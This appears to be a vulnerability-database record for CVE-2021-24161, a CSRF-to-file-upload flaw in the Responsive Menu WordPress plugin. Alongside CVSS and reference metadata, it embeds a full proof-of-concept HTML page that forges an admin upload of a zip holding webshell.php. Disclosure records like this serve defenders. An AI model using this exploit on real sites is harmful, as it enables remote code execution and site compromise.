Description
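In the Responsive Menu (free and Pro) WordPress plugins before 4.0.4, attackers could craft a request and trick an administrator into uploading a zip archive containing malicious PHP files. The attacker could then access those files to achieve remote code execution and further infect the targeted site. The record below classifies the weakness as cross-site request forgery (CWE-352): exploitation depends on an administrator with an active session being induced to trigger the forged upload request (user interaction is required in the CVSS 3.1 vector), and only versions earlier than 4.0.4 are listed as affected.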
Affected Software
Related
{"id": "CVE-2021-24161", "vendorId": null, "type": "cve", "bulletinFamily": "NVD", "title": "CVE-2021-24161", "description": "In the Reponsive Menu (free and Pro) WordPress plugins before 4.0.4, attackers could craft a request and trick an administrator into uploading a zip archive containing malicious PHP files. The attacker could then access those files to achieve remote code execution and further infect the targeted site.", "published": "2021-04-05T19:15:00", "modified": "2021-04-08T19:26:00", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "accessVector": "NETWORK", "accessComplexity": "MEDIUM", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "baseScore": 6.8}, "severity": "MEDIUM", "exploitabilityScore": 8.6, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": true}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-24161", "reporter": "contact@wpscan.com", "references": ["https://wpscan.com/vulnerability/efca27e0-bdb6-4497-8330-081f909d6933", "https://www.wordfence.com/blog/2021/02/multiple-vulnerabilities-patched-in-responsive-menu-plugin/"], "cvelist": ["CVE-2021-24161"], "immutableFields": [], "lastseen": "2022-03-23T14:48:17", "viewCount": 10, "enchantments": {"dependencies": {"references": [{"type": "wpexploit", "idList": 
["WPEX-ID:EFCA27E0-BDB6-4497-8330-081F909D6933"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:EFCA27E0-BDB6-4497-8330-081F909D6933"]}], "rev": 4}, "score": {"value": 5.3, "vector": "NONE"}, "backreferences": {"references": [{"type": "wpexploit", "idList": ["WPEX-ID:EFCA27E0-BDB6-4497-8330-081F909D6933"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:EFCA27E0-BDB6-4497-8330-081F909D6933"]}]}, "exploitation": null, "vulnersScore": 5.3}, "_state": {"dependencies": 0}, "_internal": {}, "cna_cvss": {"cna": null, "cvss": {}}, "cpe": [], "cpe23": [], "cwe": ["CWE-352"], "affectedSoftware": [{"cpeName": "expresstech:responsive_menu", "version": "4.0.4", "operator": "lt", "name": "expresstech responsive menu"}, {"cpeName": "expresstech:responsive_menu", "version": "4.0.4", "operator": "lt", "name": "expresstech responsive menu"}], "affectedConfiguration": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"operator": "OR", "children": [], "cpe_match": [{"vulnerable": true, "cpe23Uri": "cpe:2.3:a:expresstech:responsive_menu:4.0.4:*:*:*:free:wordpress:*:*", "versionEndExcluding": "4.0.4", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:expresstech:responsive_menu:4.0.4:*:*:*:pro:wordpress:*:*", "versionEndExcluding": "4.0.4", "cpe_name": []}]}]}, "extraReferences": [{"url": "https://wpscan.com/vulnerability/efca27e0-bdb6-4497-8330-081f909d6933", "name": "https://wpscan.com/vulnerability/efca27e0-bdb6-4497-8330-081f909d6933", "refsource": "CONFIRM", "tags": ["Third Party Advisory"]}, {"url": "https://www.wordfence.com/blog/2021/02/multiple-vulnerabilities-patched-in-responsive-menu-plugin/", "name": "https://www.wordfence.com/blog/2021/02/multiple-vulnerabilities-patched-in-responsive-menu-plugin/", "refsource": "MISC", "tags": ["Exploit", "Third Party Advisory"]}]}
{"wpvulndb": [{"lastseen": "2021-02-24T16:27:03", "bulletinFamily": "software", "cvelist": ["CVE-2021-24161"], "description": "\"Attackers could craft a request and trick an administrator into uploading a zip archive containing malicious PHP files. The attacker could then access those files to achieve remote code execution and further infect the targeted site.\"\n\n### PoC\n", "modified": "2021-02-19T06:00:56", "id": "WPVDB-ID:EFCA27E0-BDB6-4497-8330-081F909D6933", "href": "https://wpscan.com/vulnerability/efca27e0-bdb6-4497-8330-081f909d6933", "published": "2021-02-10T00:00:00", "type": "wpvulndb", "title": "Responsive Menu < 4.0.4 - CSRF to Arbitrary File Upload ", "sourceData": "", "cvss": {"score": 0.0, "vector": "NONE"}}], "wpexploit": [{"lastseen": "2021-02-24T16:27:03", "bulletinFamily": "exploit", "cvelist": ["CVE-2021-24161"], "description": "\"Attackers could craft a request and trick an administrator into uploading a zip archive containing malicious PHP files. The attacker could then access those files to achieve remote code execution and further infect the targeted site.\"\n", "modified": "2021-02-19T06:00:56", "published": "2021-02-10T00:00:00", "id": "WPEX-ID:EFCA27E0-BDB6-4497-8330-081F909D6933", "href": "", "type": "wpexploit", "title": "Responsive Menu < 4.0.4 - CSRF to Arbitrary File Upload ", "sourceData": "<html>\r\n <body>\r\n <script>\r\n function submitRequest()\r\n {\r\n var xhr = new XMLHttpRequest();\r\n xhr.open(\"POST\", \"URL/admin.php?page=responsive-menu\", true);\r\n xhr.setRequestHeader(\"Content-Type\", \"multipart\\/form-data; boundary=----WebKitFormBoundarygnyRsNOKdwWN8fJj\");\r\n xhr.setRequestHeader(\"Accept\", \"*\");\r\n xhr.setRequestHeader(\"Accept-Language\", \"en-US,en;q=0.9\");\r\n xhr.withCredentials = true;\r\n var body = \"\\r\\n\" + \r\n \"------WebKitFormBoundarygnyRsNOKdwWN8fJj\\r\\n\" + \r\n \"Content-Disposition: form-data; name=\\\"responsive-menu-import-theme-file\\\"; filename=\\\"webshell.zip\\\"\\r\\n\" + 
\r\n \"Content-Type: application/zip\\r\\n\" + \r\n \"\\r\\n\" + \r\n \"PK\\x03\\x04\\x14\\x00\\x00\\x00\\x00\\x00jP\\x91Q\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\t\\x00 \\x00webshell/UT\\r\\x00\\x079s\\xdb_:s\\xdb_@s\\xdb_ux\\x0b\\x00\\x01\\x04\\xf5\\x01\\x00\\x00\\x04\\x14\\x00\\x00\\x00PK\\x03\\x04\\x14\\x00\\x08\\x00\\x08\\x00+f\\x90Q\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xc8\\x06\\x00\\x00\\x17\\x00 \\x00webshell/something.jsonUT\\r\\x00\\x07\\xa3H\\xda_0s\\xdb_9s\\xdb_ux\\x0b\\x00\\x01\\x04\\xf5\\x01\\x00\\x00\\x04\\x14\\x00\\x00\\x00\\xbdU[O\\xdb0\\x14~\\xef\\xaf8d\\x88R\\t7\\x80\\x86\\x86J\\x12\\xb4A\\xd0\\xf6\\xb0\\x95\\xd1\\xb2\\x8b\\xd0T9\\xf1ica\\xc7\\x99\\xe3\\x14\\xba\\x89\\xff\\x3e;MK\\xca\\x98x[\\xd4*\\xb6\\xcf\\xfd\\xfb|N\\x82\\xd3\\\"+:|\\n\" + \r\n \"\\xbb[(\\x0b\\xb3\\xd8\\xdd\\x9e\\\\\\x0eG\\xe3\\x9bn*Y\\xf7G\\xaf\\x07\\xbf;`\\x9fm\\xbb\\x85\\x10\\xca\\x0c\\x85\\x98\\xe0=\\xa6O\\xf4N:\\x0f\\x9d\\xd3\\xa8\\x13l\\x9d\\x0f\\xcf\\xc6\\xdf/c\\xc8\\x8c\\x14v\\xdf\\xbc\\xb6\\x08\\x81w\\x0bx\\xab\\xcd\\xa2\\x92\\xb0\\x9b\\x19S\\x94\\x03\\xdf\\x9fq\\x93UI?U\\xd2\\xa7NT\\xc9\\x1e\\x10\\xe2\\xcc\\x90\\xb2\\xa8SG\\x0e$\\x1a\\n\" + \r\n 
\"iFu\\x89&\\xf4*3%\\xc7\\xde\\x86\\xccy#\\xf8\\xb3\\xe2\\xf3\\xd0\\xfbF\\xae\\xdf\\x923%\\x0bjx\\\"\\xd0\\x83T\\xe5\\x06sk\\xf8!\\x0e\\x91\\xcdp\\xd34\\xa7\\x12Co\\xce\\xf1\\xaeP\\xda\\xb4\\xb4\\xef83Y\\xc8p\\xceS$\\xf5f\\x0fx\\xce\\r\\xa7\\x82\\x94)\\x15\\x18\\x1e\\xac=\\t\\x9e\\xdf\\x82F\\x11z\\xa5Y\\x08\\xb4\\x18\\xa1ue\\x16\\x85um\\xf0\\xde\\xf8iYz\\x90i\\x9c\\x86\\x9e\\xef\\'J\\x99\\xf2\\x8e\\x9a4\\xab\\xeb~\\xedO\\x055b\\xb1\\x3c7\\x9a\\x16}\\xc9\\xf3\\xbe3Y\\xf97\\xdc\\x08\\x8c\\xbeb\\x02#\\x07\\x7f\\xe0/\\x0f\\x1ai\\x1d3\\xaa\\xd7\\xee\\xc9\\x0e\\x1b\\xc6VO\\xaa\\x84\\xd2\\x03\\xd0\\xb3\\x84\\xee\\xee\\xef\\xc1\\xf2\\xd7\\x7fsd)[\\xa9\\x3ct\\xd6\\xcbB\\xe3\\x13\\xfb\\x822\\xc6\\xf3\\xd9\\x00\\x0e\\x8e\\x8a\\xfb\\x93\\r\\x11\\xb9\\xc3\\xe4\\x96\\x1b\\x92(\\xcdP\\x13M\\x19\\xaf\\xca\\x01\\xfc\\xad\\'\\xd5\\xaf\\x17\\x95^\\x94\\xd3\\xf4v\\xa6U\\x953\\xd2\\x94\\xf4*\\x3e\\xbb\\xd8\\xbf8x\\xb6\\x8e\\xbec\\x92\\xf2\\x1c\\xf5\\x93rj.\\x07p|\\xb4\\xdf\\x0e\\xf0\\xb0\\xc4\\xd2o\\xc0\\xec\\x04~s\\x03\\x83D\\xb1\\x85{3\\x3e\\x87T\\xd0\\xb2\\x0c\\xbd\\xb5\\xeb5C-a\\x91\\x90C\\x90\\x86\\xbc\\x06iW\\xde#1Av\\x10]\\xbe\\xbf\\\\qhw-\\xd1a\\x04\\xb1m\\xaa\\xca 
\\xd8\\xbb\\xae\\xa4\\xa49\\xb3\\xe9\\xd8\\xf3&1\\x1ba\\x15l\\xaa\\xb4\\x04{{3\\xc5B\\xcf\\xf5`;H+\\x13\\xa7G\\x1cbEK\\xa1V\\x124A\\x01Vnk\\x91\\xcc\\x8b\\xec\\x1d\\xd2*\\x9fEg\\xcb\\xc0\\x0e\\x86z\\x1f\\xf8\\xb5\\xe6\\x13k\\x9e\\x17\\x95i]oo#\\xa0\\x03G+\\xe15\\xad\\xe5\\xfc\\x03g\\xcdbNEe\\x0f\\x83\\xd3\\xb0\\x9e\\x0fe\\x81\\xa9m\\xa8\\xba\\xb77\\xe7\\xc9\\x1e\\xc4\\x9f\\xc6\\x93\\xcf\\xd7\\xc3q\\x3c\\xda\\x83\\xee\\xf5\\xf8\\x82\\x1cw{p\\x1ay\\xb6\\xd1l\\xa7kd\\xad\\xa2\\x97\\xe8\\xac\\xb7Ie\\x8c\\xca\\x9b\\x0c\\xcb*\\x91\\xfc1\\xc7\\xc4\\xe4`\\xff\\xa4\\xd0\\\\R\\xbd\\xf0\\xa2\\x06\\xf6\\xc0_Z\\xad\\xf0v\\xb5\\xac\\x00w\\x13\\x12\\xdc\\x84tC\\xb07\\xb0Y\\x3c\\x8b\\xf7?\\x99_S\\x3c\\xac\\x8c\\x83\\xee\\x91\\xd7\\xe7\\xb2\\xb7\\x1dh\\x07\\xe0\\xb3\\x08\\xd9\\xf0\\xff\\x04\\xa6\\xe5\\xaf\\xf6\\xf0\\x989\\x8a\\x12\\xeb\\xf9^\\xcf\\xf0\\x9d\\x1d\\xd8\\x9e\\x8c\\xe2\\xab/\\xf1\\xd5M\\xf7*\\xfe|\\x1d\\x8f\\xc6\\x93\\x8f\\xf1\\xf8\\xfd\\xf0\\xbc\\xfb\\x03\\xc2\\x10\\xba\\x8e\\x86\\xee\\x7f)3(%\\x15\\\"\\xfa\\xa4,\\xa9e%L\\xdf\\xde\\xbc\\xfa\\xe4\\xef\\x1ar\\xc6\\xa7\\'.\\xa5U+X\\xc2\\x9a\\xce\\xf4\\xebo\\xcc\\x1fPK\\x07\\x08\\xeby\\xe1\\xae\\x16\\x03\\x00\\x00\\xc8\\x06\\x00\\x00PK\\x03\\x04\\x14\\x00\\x08\\x00\\x08\\x00+f\\x90Q\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xc8\\x06\\x00\\x00\\x15\\x00 \\x00webshell/webshell.phpUT\\r\\x00\\x07\\xa3H\\xda_\\x89r\\xdb_\\xa3H\\xda_ux\\x0b\\x00\\x01\\x04\\xf5\\x01\\x00\\x00\\x04\\x14\\x00\\x00\\x00\\xbdU[O\\xdb0\\x14~\\xef\\xaf8d\\x88R\\t7\\x80\\x86\\x86J\\x12\\xb4A\\xd0\\xf6\\xb0\\x95\\xd1\\xb2\\x8b\\xd0T9\\xf1ica\\xc7\\x99\\xe3\\x14\\xba\\x89\\xff\\x3e;MK\\xca\\x98x[\\xd4*\\xb6\\xcf\\xfd\\xfb|N\\x82\\xd3\\\"+:|\\n\" + \r\n 
\"\\xbb[(\\x0b\\xb3\\xd8\\xdd\\x9e\\\\\\x0eG\\xe3\\x9bn*Y\\xf7G\\xaf\\x07\\xbf;`\\x9fm\\xbb\\x85\\x10\\xca\\x0c\\x85\\x98\\xe0=\\xa6O\\xf4N:\\x0f\\x9d\\xd3\\xa8\\x13l\\x9d\\x0f\\xcf\\xc6\\xdf/c\\xc8\\x8c\\x14v\\xdf\\xbc\\xb6\\x08\\x81w\\x0bx\\xab\\xcd\\xa2\\x92\\xb0\\x9b\\x19S\\x94\\x03\\xdf\\x9fq\\x93UI?U\\xd2\\xa7NT\\xc9\\x1e\\x10\\xe2\\xcc\\x90\\xb2\\xa8SG\\x0e$\\x1a\\n\" + \r\n \"iFu\\x89&\\xf4*3%\\xc7\\xde\\x86\\xccy#\\xf8\\xb3\\xe2\\xf3\\xd0\\xfbF\\xae\\xdf\\x923%\\x0bjx\\\"\\xd0\\x83T\\xe5\\x06sk\\xf8!\\x0e\\x91\\xcdp\\xd34\\xa7\\x12Co\\xce\\xf1\\xaeP\\xda\\xb4\\xb4\\xef83Y\\xc8p\\xceS$\\xf5f\\x0fx\\xce\\r\\xa7\\x82\\x94)\\x15\\x18\\x1e\\xac=\\t\\x9e\\xdf\\x82F\\x11z\\xa5Y\\x08\\xb4\\x18\\xa1ue\\x16\\x85um\\xf0\\xde\\xf8iYz\\x90i\\x9c\\x86\\x9e\\xef\\'J\\x99\\xf2\\x8e\\x9a4\\xab\\xeb~\\xedO\\x055b\\xb1\\x3c7\\x9a\\x16}\\xc9\\xf3\\xbe3Y\\xf97\\xdc\\x08\\x8c\\xbeb\\x02#\\x07\\x7f\\xe0/\\x0f\\x1ai\\x1d3\\xaa\\xd7\\xee\\xc9\\x0e\\x1b\\xc6VO\\xaa\\x84\\xd2\\x03\\xd0\\xb3\\x84\\xee\\xee\\xef\\xc1\\xf2\\xd7\\x7fsd)[\\xa9\\x3ct\\xd6\\xcbB\\xe3\\x13\\xfb\\x822\\xc6\\xf3\\xd9\\x00\\x0e\\x8e\\x8a\\xfb\\x93\\r\\x11\\xb9\\xc3\\xe4\\x96\\x1b\\x92(\\xcdP\\x13M\\x19\\xaf\\xca\\x01\\xfc\\xad\\'\\xd5\\xaf\\x17\\x95^\\x94\\xd3\\xf4v\\xa6U\\x953\\xd2\\x94\\xf4*\\x3e\\xbb\\xd8\\xbf8x\\xb6\\x8e\\xbec\\x92\\xf2\\x1c\\xf5\\x93rj.\\x07p|\\xb4\\xdf\\x0e\\xf0\\xb0\\xc4\\xd2o\\xc0\\xec\\x04~s\\x03\\x83D\\xb1\\x85{3\\x3e\\x87T\\xd0\\xb2\\x0c\\xbd\\xb5\\xeb5C-a\\x91\\x90C\\x90\\x86\\xbc\\x06iW\\xde#1Av\\x10]\\xbe\\xbf\\\\qhw-\\xd1a\\x04\\xb1m\\xaa\\xca 
\\xd8\\xbb\\xae\\xa4\\xa49\\xb3\\xe9\\xd8\\xf3&1\\x1ba\\x15l\\xaa\\xb4\\x04{{3\\xc5B\\xcf\\xf5`;H+\\x13\\xa7G\\x1cbEK\\xa1V\\x124A\\x01Vnk\\x91\\xcc\\x8b\\xec\\x1d\\xd2*\\x9fEg\\xcb\\xc0\\x0e\\x86z\\x1f\\xf8\\xb5\\xe6\\x13k\\x9e\\x17\\x95i]oo#\\xa0\\x03G+\\xe15\\xad\\xe5\\xfc\\x03g\\xcdbNEe\\x0f\\x83\\xd3\\xb0\\x9e\\x0fe\\x81\\xa9m\\xa8\\xba\\xb77\\xe7\\xc9\\x1e\\xc4\\x9f\\xc6\\x93\\xcf\\xd7\\xc3q\\x3c\\xda\\x83\\xee\\xf5\\xf8\\x82\\x1cw{p\\x1ay\\xb6\\xd1l\\xa7kd\\xad\\xa2\\x97\\xe8\\xac\\xb7Ie\\x8c\\xca\\x9b\\x0c\\xcb*\\x91\\xfc1\\xc7\\xc4\\xe4`\\xff\\xa4\\xd0\\\\R\\xbd\\xf0\\xa2\\x06\\xf6\\xc0_Z\\xad\\xf0v\\xb5\\xac\\x00w\\x13\\x12\\xdc\\x84tC\\xb07\\xb0Y\\x3c\\x8b\\xf7?\\x99_S\\x3c\\xac\\x8c\\x83\\xee\\x91\\xd7\\xe7\\xb2\\xb7\\x1dh\\x07\\xe0\\xb3\\x08\\xd9\\xf0\\xff\\x04\\xa6\\xe5\\xaf\\xf6\\xf0\\x989\\x8a\\x12\\xeb\\xf9^\\xcf\\xf0\\x9d\\x1d\\xd8\\x9e\\x8c\\xe2\\xab/\\xf1\\xd5M\\xf7*\\xfe|\\x1d\\x8f\\xc6\\x93\\x8f\\xf1\\xf8\\xfd\\xf0\\xbc\\xfb\\x03\\xc2\\x10\\xba\\x8e\\x86\\xee\\x7f)3(%\\x15\\\"\\xfa\\xa4,\\xa9e%L\\xdf\\xde\\xbc\\xfa\\xe4\\xef\\x1ar\\xc6\\xa7\\'.\\xa5U+X\\xc2\\x9a\\xce\\xf4\\xebo\\xcc\\x1fPK\\x07\\x08\\xeby\\xe1\\xae\\x16\\x03\\x00\\x00\\xc8\\x06\\x00\\x00PK\\x03\\x04\\x14\\x00\\x08\\x00\\x08\\x00kP\\x91Q\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x04\\x18\\x00\\x00\\x12\\x00 \\x00webshell/.DS_StoreUT\\r\\x00\\x07:s\\xdb_Cs\\xdb_:s\\xdb_ux\\x0b\\x00\\x01\\x04\\xf5\\x01\\x00\\x00\\x04\\x14\\x00\\x00\\x00\\xed\\x98\\xb1N\\xc30\\x14E\\xef\\x0b\\x19\\\"QU\\x16\\x13\\xa3G\\xa6J\\x8c\\xdd\\xac\\xaa\\x0c\\xcc\\xfd\\x01\\x94\\x16QP\\xdaTj\\x11k6\\xbe\\x85\\xaf\\xa4N\\xde\\x15r\\xd5t`*\\xa2\\xefD\\xd6\\x89\\x12_\\xc7Y\\x1c\\xbf\\x00\\x90\\xc9\\xfb\\xe2\\x1ep\\x00\\n\" + \r\n \"\\xa8\\xf1\\x89^\\n\" + \r\n 
\"\\xb6#\\xb2\\xc4\\xd2\\x8d\\xb1\\xc3\\x12\\xafX\\xe3\\x05\\xa3\\xfe\\xb1z\\xc7\\x18b\\x8b\\x1a+\\x3c\\x1f\\xe4\\xdf\\xba\\xab\\xeb\\xc7\\xaa\\x9e\\x97U]\\xea$\\xe5&z\\xfc\\xdd\\xd1\\xe5\\x07\\xf8\\x88\\xb92\\xf6]FW\\xf1\\x18a\\x13\\xcf7\\x879|\\xc5v\\x97\\xe4\\x0c\\xc30\\x0c\\xe3R\\x11Uq}\\xdei\\x18\\x86\\xf1\\x07i\\xd7\\x07O\\x07\\xbaQ\\x0b\\xefgt\\x9ed\\x1c\\xed\\xe9@7ja\\xbf\\x8c\\xce\\xe9\\x82v\\xb4\\xa7\\x03\\xdd\\xa8\\xb9h\\t\\x8b\\x0f\\xe1\\x93\\x85\\x15\\x8a8\\xda\\xd3\\xe1W\\xafl\\x18\\x17\\xc3\\x95\\xca\\xb5\\xdf\\xff\\x07\\x9c\\xac\\xff\\r\\xc3\\xf8\\xc7H\\x3e\\x9dM\\'\\xf8)\\x08\\x8eh\\xbf\\xb5\\x3e\\xb6\\xa74tb\\x13\\x90\\xe9\\xcf\\xc2\\xdb\\xa4\\x9f\\xa7\\x03\\xdd\\xa8m#`\\x18\\xe7b\\x0fPK\\x07\\x08\\x1c8o\\x96\\x03\\x01\\x00\\x00\\x04\\x18\\x00\\x00PK\\x03\\x04\\x14\\x00\\x08\\x00\\x08\\x00kP\\x91Q\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00x\\x00\\x00\\x00\\x1d\\x00 \\x00__MACOSX/webshell/._.DS_StoreUT\\r\\x00\\x07:s\\xdb_Cs\\xdb_Ws\\xdb_ux\\x0b\\x00\\x01\\x04\\xf5\\x01\\x00\\x00\\x04\\x14\\x00\\x00\\x00c`\\x15cg`b`\\xf0MLV\\xf0\\x0fV\\x88P\\x80\\x02\\x90\\x18\\x03\\'\\x10\\x1b\\x01\\xb1\\x1b\\x10\\x83\\xf8\\x15@\\xcc\\x00S\\xe1 \\xc0\\x80\\x038\\x86\\x84\\x04A\\x99\\x150]\\xe8\\x00\\x00PK\\x07\\x08\\x0b\\x88\\xc085\\x00\\x00\\x00x\\x00\\x00\\x00PK\\x01\\x02\\x14\\x03\\x14\\x00\\x00\\x00\\x00\\x00jP\\x91Q\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\t\\x00 \\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xfdA\\x00\\x00\\x00\\x00webshell/UT\\r\\x00\\x079s\\xdb_:s\\xdb_@s\\xdb_ux\\x0b\\x00\\x01\\x04\\xf5\\x01\\x00\\x00\\x04\\x14\\x00\\x00\\x00PK\\x01\\x02\\x14\\x03\\x14\\x00\\x08\\x00\\x08\\x00+f\\x90Q\\xeby\\xe1\\xae\\x16\\x03\\x00\\x00\\xc8\\x06\\x00\\x00\\x17\\x00 
\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xfd\\x81G\\x00\\x00\\x00webshell/something.jsonUT\\r\\x00\\x07\\xa3H\\xda_0s\\xdb_9s\\xdb_ux\\x0b\\x00\\x01\\x04\\xf5\\x01\\x00\\x00\\x04\\x14\\x00\\x00\\x00PK\\x01\\x02\\x14\\x03\\x14\\x00\\x08\\x00\\x08\\x00+f\\x90Q\\xeby\\xe1\\xae\\x16\\x03\\x00\\x00\\xc8\\x06\\x00\\x00\\x15\\x00 \\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xfd\\x81\\xc2\\x03\\x00\\x00webshell/webshell.phpUT\\r\\x00\\x07\\xa3H\\xda_\\x89r\\xdb_\\xa3H\\xda_ux\\x0b\\x00\\x01\\x04\\xf5\\x01\\x00\\x00\\x04\\x14\\x00\\x00\\x00PK\\x01\\x02\\x14\\x03\\x14\\x00\\x08\\x00\\x08\\x00kP\\x91Q\\x1c8o\\x96\\x03\\x01\\x00\\x00\\x04\\x18\\x00\\x00\\x12\\x00 \\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xa4\\x81;\\x07\\x00\\x00webshell/.DS_StoreUT\\r\\x00\\x07:s\\xdb_Cs\\xdb_:s\\xdb_ux\\x0b\\x00\\x01\\x04\\xf5\\x01\\x00\\x00\\x04\\x14\\x00\\x00\\x00PK\\x01\\x02\\x14\\x03\\x14\\x00\\x08\\x00\\x08\\x00kP\\x91Q\\x0b\\x88\\xc085\\x00\\x00\\x00x\\x00\\x00\\x00\\x1d\\x00 \\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xa4\\x81\\x9e\\x08\\x00\\x00__MACOSX/webshell/._.DS_StoreUT\\r\\x00\\x07:s\\xdb_Cs\\xdb_Ws\\xdb_ux\\x0b\\x00\\x01\\x04\\xf5\\x01\\x00\\x00\\x04\\x14\\x00\\x00\\x00PK\\x05\\x06\\x00\\x00\\x00\\x00\\x05\\x00\\x05\\x00\\xea\\x01\\x00\\x00\\x3e\\t\\x00\\x00\\x00\\x00\\r\\n\" + \r\n \"------WebKitFormBoundarygnyRsNOKdwWN8fJj\\r\\n\" + \r\n \"Content-Disposition: form-data; name=\\\"responsive-menu-import-theme\\\"\\r\\n\" + \r\n \"\\r\\n\" + \r\n \"\\r\\n\" + \r\n \"------WebKitFormBoundarygnyRsNOKdwWN8fJj\\r\\n\" + \r\n \"Content-Disposition: form-data; name=\\\"responsive-menu-current-page\\\"\\r\\n\" + \r\n \"\\r\\n\" + \r\n \"themes\\r\\n\" + \r\n \"------WebKitFormBoundarygnyRsNOKdwWN8fJj--\\r\\n\";\r\n var aBody = new Uint8Array(body.length);\r\n for (var i = 0; i < aBody.length; i++)\r\n aBody[i] = body.charCodeAt(i); \r\n xhr.send(new Blob([aBody]));\r\n }\r\n </script>\r\n <form action=\"#\">\r\n <input type=\"button\" value=\"Submit request\" 
onclick=\"submitRequest();\" />\r\n </form>\r\n </body>\r\n</html>", "cvss": {"score": 0.0, "vector": "NONE"}}]}